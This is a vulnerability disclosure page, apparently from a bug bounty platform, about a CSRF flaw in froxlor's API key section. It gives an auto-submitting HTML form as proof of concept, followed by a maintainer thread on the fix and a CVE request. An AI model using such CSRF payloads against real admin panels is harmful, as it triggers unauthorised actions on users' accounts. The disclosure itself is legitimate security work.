Unintended API key generation in froxlor/froxlor

Valid

Reported on

Nov 9th 2022


Description

The API keys sections are vulnerable to CSRF. The aggressor can generate the key on the admin's account without prior knowledge of admin credentials. The successful CSRF will generate new keys on the admin's account.

Proof of Concept


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.froxlor.org/admin_index.php">
      <meta name="referrer" content="no-referrer">
      <input type="hidden" name="page" value="apikeys" />
      <input type="hidden" name="action" value="add" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Video PoC


Visit ---> https://vimeo.com/769066009 

Impact

Illegal Key generation

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
Michael Kaufmann validated this vulnerability 2 months ago

Thank you for the report, it will be fixed in the next scheduled release on 2nd of December

Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Kiran PP
2 months ago

Researcher


Can we go for a CVE ?? @maintainer @admin

Pavlos
2 months ago

Admin


The maintainer will chose wether to assign a CVE once they publish your vulnerability on Dec 2nd.

Kiran PP
a month ago

Researcher


Then please assign a CVE for this one! @maintainer

Kiran PP
a month ago

Researcher


@maintainer & @admin, A short reminder!

Please go for a CVE

Pavlos
a month ago

Admin


No need for reminders :)

Michael Kaufmann marked this as fixed in 0.10.38.3 with commit 4d454a a month ago
Michael Kaufmann has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Dec 3rd 2022
api_keys.php#L0 has been validated
Kiran PP
a month ago

Researcher


  1. If it's not eligible for the CVE then you can point out the reason

  2. It has been said, it'll be released on December 2nd now it's changed to 3 So, reminders are needed in some cases.

  3. Many users pointed out your unprofessional behaviour Mr Pavlos, Tbh, I felt sad about it

@admin

Michael
a month ago

Maintainer


@Krian you seem to be VERY impatient. I just selected a SCHEDULED publication if this report for tomorrow because i have JUST released a new version and would like to give users at least ONE day to update

Reason for no CVE: a new api key is being generated which you cannot access. It does no harm in any way other than exist

Kiran PP
a month ago

Researcher


@Maintainer No issues & impatience from my side mate. I agree with your statement but you've to let me know about the case. Else I won't be able to understand.

If you've clearly said at 1st I never repeat. So, it's nothing about impatience, but, lack of responses matters 👍

You can read the above comments, I even didn't mention you in some statements

Regards,

Pavlos
a month ago

Admin


I'm sorry you're unhappy with me. I have tens of thousands of users to attend to alone and the @admin spamming just makes it worse for everyone.

On another note, please be more patient with maintainer, open source is a voluntary sport.

Kiran PP
a month ago

Researcher


Appreciated!

If updates are fine, no more issues

Michael Kaufmann published this vulnerability a month ago
to join this conversation